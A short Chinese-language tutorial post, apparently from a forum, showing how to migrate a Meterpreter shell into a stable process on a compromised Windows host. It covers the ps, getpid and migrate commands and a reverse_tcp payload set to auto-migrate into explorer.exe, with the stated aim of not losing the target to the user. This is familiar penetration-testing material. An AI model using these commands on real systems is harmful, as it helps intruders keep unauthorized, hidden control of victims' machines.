1.进程迁移
1.在 Meterpreter 下输入 ps(获取目标机正在运行的进程,记住目标进程的 pid xxxx)
2.输入 getpid 命令(查看 meterpreter shell 的进程号)
3.输入 migrate xxxx(将 meterpreter shell 的 pid 调到 xxxx 里相对稳定应用的进程里)
4.最后用 getpid 再次查看下是否更换成功。
2.上线后自动化迁移指定进程
在 set payload windows/meterpreter/reverse_tcp 设置完了端口与 HOST
执行如下命令:set autorunscript migrate -n explorer.exe
意思是上线后将 shell 进程迁移到了资源管理器。防止被用户删除掉,然后丢失目标。 | 
发表于 2020-11-10 18:39:25
